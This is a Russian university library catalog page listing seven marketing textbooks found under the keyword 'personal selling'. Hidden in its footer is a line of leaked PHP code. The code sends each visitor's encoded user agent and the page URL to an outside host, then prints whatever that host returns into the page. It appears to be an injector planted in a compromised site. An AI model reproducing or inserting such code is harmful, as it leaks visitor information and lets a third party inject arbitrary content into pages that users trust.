Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

154 пользователей


Зарегистрированных: 7 

Коломиец Кристина Олеговна

Коломиец Кристина Олеговна

Коломиец Кристина Олеговна

Коломиец Кристина Олеговна

Коломиец Кристина Олеговна

Коломиец Кристина Олеговна

Коломиец Кристина Олеговна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ПРОДАЖА ЛИЧНАЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 7
1. 
Кузьмина Е. Е. Теория и практика маркетинга [Текст] : учеб. для студ. высш. учеб. заведений / Е. Е. Кузьмина, Н. М. Шаляпина, 2005. - 213 с.
Ключевые слова 
МАРКЕТИНГ - теория -- СРЕДА МАРКЕТИНГОВАЯ -- ЭТИКА МАРКЕТИНГА -- МАРКЕТИНГ - практикум -- РЫНОК - МАРКЕТИНГ -- АНАЛИЗ РЫНКА -- СЕГМЕНТИРОВАНИЕ РЫНКА -- ПОЗИЦИОНИРОВАНИЕ РЫНКА -- АНАЛИЗ потребителей -- ПОВЕДЕНИЕ ПОКУПАТЕЛЯ -- ПОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКОЕ -- ПРАВА потребителей -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- КОНКУРЕНЦИЯ - МАРКЕТИНГ -- КОНКУРЕНТОСПОСОБНОСТЬ ПРЕДПР -- КОНКУРЕНТОСПОСОБНОСТЬ ТОВАРА -- ТОВАР - МАРКЕТИНГ -- ПОЛИТИКА ЦЕНОВАЯ - МАРКЕТИНГ -- ЦЕНА - МАРКЕТИНГ -- ТОВАРОДВИЖЕНИЕ -- ПОСРЕДНИК рыночный -- СБЫТ ТОВАРА -- ТОРГОВЛЯ ОПТОВАЯ - МАРКЕТИНГ -- ТОРГОВЛЯ РОЗНИЧНАЯ - МАРКЕТИ -- ПОЛИТИКА продвижения -- РЕКЛАМА - МАРКЕТИНГ -- СВЯЗЬ С ОБЩЕСТВЕННОСТЬЮ -- ПРОДАЖА ЛИЧНАЯ -- ПЛАНИРОВАНИЕ МАРКЕТИНГА
Держатели документа (Информация об экземплярах) 
2. 
Дурович А. П. Маркетинг гостиниц и ресторанов [Текст] : учеб. пособие / А. П. Дурович, 2005. - 632 с.
Ключевые слова 
МАРКЕТИНГ ГОСТЕПРИИМСТВА -- МАРКЕТИНГ гостиниц -- Маркетинг ресторана -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- СРЕДА МАРКЕТИНГОВАЯ -- РЫНОК - ИССЛЕДОВАНИЕ маркетинговое -- СТРАТЕГИЯ МАРКЕТИНГОВАЯ -- Политика продуктовая -- ПОЛИТИКА ЦЕНОВАЯ - МАРКЕТИНГ -- ПОЛИТИКА СБЫТОВАЯ -- ПОЛИТИКА КОММУНИКАЦИОННАЯ -- РЕКЛАМА - МАРКЕТИНГ -- ПРОДАЖА ЛИЧНАЯ -- СТИМУЛИРОВАНИЕ СБЫТА -- СВЯЗЬ С ОБЩЕСТВЕННОСТЬЮ -- ВЫСТАВКА - МАРКЕТИНГ -- ЯРМАРКА - МАРКЕТИНГ -- СТИЛЬ ФИРМЕННЫЙ -- ОРГАНИЗАЦИЯ маркетинга -- КОНТРОЛЬ маркетинга
Держатели документа (Информация об экземплярах) 
3. 
Котерова Н. П. Основы маркетинга [Текст] : учеб. пособие для образовательных учреждений начального проф. образования / Н. П. Котерова, 2004. - 144 с.
Ключевые слова 
РЫНОК - МАРКЕТИНГ -- СПРОС - МАРКЕТИНГ -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- ИНФОРМАЦИЯ МАРКЕТИНГОВАЯ -- СРЕДА МАРКЕТИНГОВАЯ -- СЕГМЕНТАЦИЯ РЫНКА -- СТРАТЕГИЯ МАРКЕТИНГОВАЯ -- ПОЛИТИКА ТОВАРНАЯ - МАРКЕТИН -- ПОЛИТИКА ЦЕНОВАЯ - МАРКЕТИНГ -- ЦИКЛ ЖИЗНЕННЫЙ ТОВАРА -- МАРКА ТОВАРНАЯ -- ЦЕНООБРАЗОВАНИЕ - МАРКЕТИНГ -- ТОВАРОДВИЖЕНИЕ -- Дистрибуция -- ПРОДВИЖЕНИЕ ТОВАРА -- ПРОДАЖА ЛИЧНАЯ -- СТИМУЛИРОВАНИЕ СБЫТА -- ПЛАНИРОВАНИЕ МАРКЕТИНГОВОЕ -- УПРАВЛЕНИЕ МАРКЕТИНГОМ
Держатели документа (Информация об экземплярах) 
4. 
Голубкова Е. Н. Маркетинговые коммуникации [Текст] : Учеб. пособие / Е. Н. Голубкова, 2003. - 303 с.
Держатели документа (Информация об экземплярах) 
5. 
Барышев А. Ф. Маркетинг [Текст] : Учеб. для студ. образоват. учреждений сред. проф. образования / А. Ф. Барышев, 2002. - 208 с.
Ключевые слова 
Держатели документа (Информация об экземплярах) 
6. 
Белоусова С. Н. Маркетинг [Текст] : Учеб. пособие для студ. образоват. учреждений сред. проф. образования / С. Н. Белоусова, А. Г. Белоусов, 2003. - 252 с.
Ключевые слова 
МАРКЕТИНГ - ИСТОРИЯ -- РЫНОК - МАРКЕТИНГ -- РЫНОК ЦЕЛЕВОЙ -- СЕГМЕНТАЦИЯ РЫНКА -- ПОЗИЦИОНИРОВАНИЕ ТОВАРА -- СРЕДА ВНЕШНЯЯ - МАРКЕТИНГ -- Среда внутренняя - маркетинг -- ПОТРЕБНОСТЬ - МАРКЕТИНГ -- ПОТРЕБИТЕЛЬ - Маркетинг -- ПОВЕДЕНИЕ ПОТРЕБИТЕЛЬСКОЕ -- КОНКУРЕНЦИЯ -- СЛУЖБА МАРКЕТИНГА -- ТОВАР - МАРКЕТИНГ -- ПОЛИТИКА ТОВАРНАЯ -- ЦИКЛ ЖИЗНЕННЫЙ ТОВАРА -- УПАКОВКА ТОВАРА -- бренд -- БРЕНДИНГ -- СБЫТ ТОВАРА -- ПОЛИТИКА СБЫТОВАЯ -- ПОСРЕДНИК ТОРГОВЫЙ -- ЦЕНА - МАРКЕТИНГ -- ПОЛИТИКА ЦЕНОВАЯ ПРЕДПРИЯТИЯ -- ПРОДВИЖЕНИЕ ТОВАРА -- РЕКЛАМА - МАРКЕТИНГ -- КАМПАНИЯ РЕКЛАМНАЯ -- ПРОДАЖА ЛИЧНАЯ -- мерчандайзинг -- ПАБЛИК РИЛЕЙШНЗ -- ФОССТИС -- ПЛАНИРОВАНИЕ МАРКЕТИНГОВОЕ -- ПЛАНИРОВАНИЕ СТРАТЕГИЧЕСКОЕ -- КОНТРОЛЬ МАРКЕТИНГОВЫЙ -- СТРАТЕГИЯ МАРКЕТИНГОВАЯ -- ИССЛЕДОВАНИЕ МАРКЕТИНГОВОЕ -- ИНФОРМАЦИЯ МАРКЕТИНГОВАЯ -- МАРКЕТИНГ - СЛОВАРЬ ТЕРМИНОВ
Держатели документа (Информация об экземплярах) 
7. 
Основы маркетинга: Пер. с англ. [Текст] / Ф. Котлер, Г. Армстронг, Д. Сондерс, В. Вонг, 1999. - 1151 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3087 - 22.11.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.58 с.12 запросов, 0.33c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;